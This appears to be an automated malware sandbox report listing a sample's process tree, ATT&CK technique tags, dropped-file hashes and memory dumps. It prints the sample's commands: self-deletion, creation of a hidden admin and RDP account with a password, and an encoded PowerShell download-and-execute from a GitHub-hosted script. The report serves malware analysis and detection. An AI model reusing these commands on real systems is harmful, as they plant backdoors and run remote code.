C:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\8cb590f2b6915a98149d41b605f084cd0d08134ac34812b1b6a67f27615e65f0.exe
2⤵
PID:2108

C:\Windows\system32\timeout.exe
timeout -n t
3⤵
- Delays execution with timeout.exe
PID:2796

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3320

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:1344

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc upqoRAba /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc upqoRAba /add
2⤵
PID:1216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc upqoRAba /add
3⤵
PID:4188

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:3700

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:5088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:1060

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD
1⤵
PID:2212

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD
2⤵
PID:4272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD
3⤵
PID:1172

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2904

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:4628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:4080

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc upqoRAba
1⤵
PID:3148

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc upqoRAba
2⤵
PID:1140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc upqoRAba
3⤵
PID:4652

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4936

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3708

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1468

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:2528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
Filesize
2.5MB

MD5
58fe246dde0695050f1a1969c48a7d99

SHA1
4a4f416aec06e9ddcafa0b5e943ab76ffe6ba338

SHA256
9b9a42a73631086ffc597a5e0ac39137ba6622a534ab1a1bbe9ae8b43446b569

SHA512
05dc80fc495ddb0f3bbef9e8db320b3060b0aa8d4a785fcc9564016cc91687c7c5efd011e5e29c905998173c9b795a1f2afa5a4e09091a89edad62e9c87a95f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE1F8.tmp
Filesize
1KB

MD5
cff5a4b113d374a7d5c7411ef2ed67cf

SHA1
04d7fcee019b70fab12d7d277d170aed0384cbb1

SHA256
0045d1736cf4a78396de1d225fad76830c5d995d703f107771fa14535ab119ec

SHA512
37ebd616828c9f752918568a9a6da838d353045b17bf07677008af0f6b450ce8b80c12c6b8a4afd3734fc1058d5d2ca2747da3f286729af7e5e8f3864516f3b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE7B5.tmp
Filesize
1KB

MD5
bd2e98e42c0de23800622f15d9f33bc6

SHA1
ac30f7320ad74f7148e118e3b70e6fa2e7b1bfb5

SHA256
3cc5c04781a32e8cad5526bd186f8fb456fa8737029866fb0f787528631ff0bb

SHA512
d377b8936538ecf902ac0d781d0abf9bcc4e51defa64fe1d39aaafd328f333a4b977f0aeff479b72828dbbd7b5432fff73d4dd40933f444ced00ddc113256073

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac2ztvel\ac2ztvel.dll
Filesize
3KB

MD5
5b2a4a3051b16b882e66316c34edbf49

SHA1
7be0ff7babaee5341a680eece058838549617279

SHA256
d2197559a40c1318ab741033ee918e3a806c7e1e0517567c7d75e19506f4b10d

SHA512
1421c6320fb3155daa038e9984f9ac4a96fec3c13965f3d3dd2b78a898db7c228791c8717fbb45571f1eef50e9708117275b95911b707d7ebb36e6a5450ed2be

Download Submit
C:\Users\Admin\AppData\Local\Temp\qo5zeajd\qo5zeajd.dll
Filesize
3KB

MD5
8f3033ddb97eb42b677d36c74eaf1c17

SHA1
a2a7319b7a8a20abc61611be00bf29da6e4c0d89

SHA256
38280b59cecd5dbc561e8a7ace6513f75ed2208618c1843d97efd8d296eb26ba

SHA512
aede543acac15e97ca5844ecba26b2e67d96b9d3e3e00cd87d83a1808d2dc8365f054125fbb151a2b08790e5d7f3a887931a09085a0743c6f1a2e23cedc66719

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
Filesize
6KB

MD5
37330f50cf392bca59567a22de3b836a

SHA1
f7b37328533a133567aa28f03015da69e2e36547

SHA256
a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1

SHA512
5d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6

Download Submit
C:\Windows\Branding\mediasrv.png
Filesize
60KB

MD5
36ac694d96075a5eb80a5c0f97c08427

SHA1
a7caea13f8af4966220d0dea30f39737ec3677c6

SHA256
5ecd070adffdaef23f3ed938b02e1abc54b9d69b636405eb664f42258fd6635b

SHA512
5a7f237a2ad1f2d048b125ff3933e044896a3ca2eaf07290a8e1b1631c7d22ab980e2c539ff745f6e19089346d22c6bf9f204ecba52d044fc78927422dde5a5d

Download Submit
C:\Windows\Branding\mediasvc.png
Filesize
743KB

MD5
60c82a60e5ed9add69b14688bbe8efc8

SHA1
cfe628f97077f0da848df2ba3324d13cddba7e8d

SHA256
edc97bc290a84fd48952cdedeae7a7f761c7db261e34dd12030b98bd52d7adea

SHA512
b5052cedd8b626a317f3545aeb16ce71f856f3001e90f61a6d52ada17ae9736ae2b4432f1f0b66f4ea7c1f4662b2d5bba8dd7c7fcbe79f7b3d8eeaabeafdf358

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ac2ztvel\CSCCB8624BBCA0449EB8BCB23B01656B891.TMP
Filesize
652B

MD5
18eebea8221574e328ecc760e6df8bce

SHA1
87b6c13bc3455eb1758214a455d508038e09127d

SHA256
72032965f4452d9d744af2ea749b832a06d82fde3ff482676d4b5651ecc4a0fb

SHA512
4eda5def6626c7205fd78acfb4ee89b28cb0caf69d95a59ec4106626e1cc7349d16991a95d924207ed31b97a009592b224bc2e5ac4a369bb55da62afe36bbba4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ac2ztvel\ac2ztvel.0.cs
Filesize
506B

MD5
fe552aa471e3747e57ddeff23d6da1fc

SHA1
16832293206ec339d47940533443f4fb375826fa

SHA256
60122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d

SHA512
8cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ac2ztvel\ac2ztvel.cmdline
Filesize
369B

MD5
180a543d901ecb8c5ee18b87f138f948

SHA1
82b7ca5d4e2db3825fe3266f71f457ab1590addd

SHA256
0daae636ff9c61c0d8a30426100cf8fe941c38879c88e7c42cf9ded0b8042e0e

SHA512
766c689f9df546243d658c97d20f7c0c95b80accde06058e0cfe382548d594654141c650fa5eb17b3b15508c22dce7e18d9f7b1832365ce497081483b6c58731

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qo5zeajd\CSCB831381AC902433DB998A28D57C72233.TMP
Filesize
652B

MD5
2e69c7a743f33899338bfa7804be31e4

SHA1
898cd1ab56a899d4c07350cee23406378937eaef

SHA256
b511f62084ab96d8236f37839c320a6ff4128f7a24a33cdb7c1bb7c2c9ae70ea

SHA512
1113fd815d2da5760516760dc5c5d192631bb65b5e552ddfa6ddaa6838a0041e327332de8869df7695e69b002cdfd20ab823eeeabdfd5d4fcb0475df0b5aaaef

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qo5zeajd\qo5zeajd.0.cs
Filesize
506B

MD5
fdff1f264c5f5570a5393659b154cb88

SHA1
de254de5e517074a9986b36fec83f921aa9aa497

SHA256
ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769

SHA512
db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qo5zeajd\qo5zeajd.cmdline
Filesize
369B

MD5
32589439f51142398912a61331d56763

SHA1
a52ee572314a2d547eeba7ffb64becfc26681e62

SHA256
bf033afd0299e0e07b9a8d198fc7acb0d8e2afc93ff1da475d5e1a490e983ef9

SHA512
17815c5f94309377d8369cd321627b7207f1d10f5f98adea07fc0507e2644c07e16213069ff475bed98bc7f075763dbe425d2eeff8c8a2ff202e17af40fe7ff1

Download Submit
memory/412-213-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/412-209-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/412-207-0x0000000000000000-mapping.dmp

Download
memory/804-186-0x0000000000000000-mapping.dmp

Download
memory/1032-145-0x0000000000000000-mapping.dmp

Download
memory/1060-194-0x0000000000000000-mapping.dmp

Download
memory/1140-200-0x0000000000000000-mapping.dmp

Download
memory/1172-196-0x0000000000000000-mapping.dmp

Download
memory/1216-191-0x0000000000000000-mapping.dmp

Download
memory/1264-180-0x0000000000000000-mapping.dmp

Download
memory/1344-190-0x0000000000000000-mapping.dmp

Download
memory/1432-168-0x0000000000000000-mapping.dmp

Download
memory/1844-140-0x0000000000000000-mapping.dmp

Download
memory/1888-176-0x0000000000000000-mapping.dmp

Download
memory/2004-165-0x0000000000000000-mapping.dmp

Download
memory/2108-210-0x0000000000000000-mapping.dmp

Download
memory/2132-179-0x0000000000000000-mapping.dmp

Download
memory/2140-182-0x0000000000000000-mapping.dmp

Download
memory/2528-205-0x0000000000000000-mapping.dmp

Download
memory/2636-171-0x0000000000000000-mapping.dmp

Download
memory/2716-148-0x0000000000000000-mapping.dmp

Download
memory/2796-212-0x0000000000000000-mapping.dmp

Download
memory/2852-183-0x0000000000000000-mapping.dmp

Download
memory/2876-169-0x0000000000000000-mapping.dmp

Download
memory/2968-174-0x0000000000000000-mapping.dmp

Download
memory/2972-170-0x0000000000000000-mapping.dmp

Download
memory/3104-178-0x0000000000000000-mapping.dmp

Download
memory/3416-164-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/3416-153-0x000001F229E00000-0x000001F22A00A000-memory.dmp

Filesize
2.0MB

Download
memory/3416-133-0x0000000000000000-mapping.dmp

Download
memory/3416-208-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/3416-134-0x000001F227EF0000-0x000001F227F12000-memory.dmp

Filesize
136KB

Download
memory/3416-136-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/3416-152-0x000001F229A70000-0x000001F229BE6000-memory.dmp

Filesize
1.5MB

Download
memory/3528-161-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/3528-159-0x0000000000000000-mapping.dmp

Download
memory/3528-162-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/3660-137-0x0000000000000000-mapping.dmp

Download
memory/3756-203-0x0000000000000000-mapping.dmp

Download
memory/3848-202-0x0000000000000000-mapping.dmp

Download
memory/3952-181-0x0000000000000000-mapping.dmp

Download
memory/3976-206-0x0000000000000000-mapping.dmp

Download
memory/4028-185-0x0000000000000000-mapping.dmp

Download
memory/4080-199-0x0000000000000000-mapping.dmp

Download
memory/4088-154-0x0000000000000000-mapping.dmp

Download
memory/4088-155-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4088-156-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4164-160-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4164-158-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4164-157-0x0000000000000000-mapping.dmp

Download
memory/4188-192-0x0000000000000000-mapping.dmp

Download
memory/4252-211-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4252-163-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4252-132-0x00007FF8F8BA0000-0x00007FF8F9661000-memory.dmp

Filesize
10.8MB

Download
memory/4272-195-0x0000000000000000-mapping.dmp

Download
memory/4524-167-0x0000000000000000-mapping.dmp

Download
memory/4536-172-0x0000000000000000-mapping.dmp

Download
memory/4584-173-0x0000000000000000-mapping.dmp

Download
memory/4608-204-0x0000000000000000-mapping.dmp

Download
memory/4628-198-0x0000000000000000-mapping.dmp

Download
memory/4652-201-0x0000000000000000-mapping.dmp

Download
memory/4680-175-0x0000000000000000-mapping.dmp

Download
memory/4756-177-0x0000000000000000-mapping.dmp

Download
memory/5004-189-0x0000000000000000-mapping.dmp

Download
memory/5088-193-0x0000000000000000-mapping.dmp

Download
memory/5108-184-0x0000000000000000-mapping.dmp

Download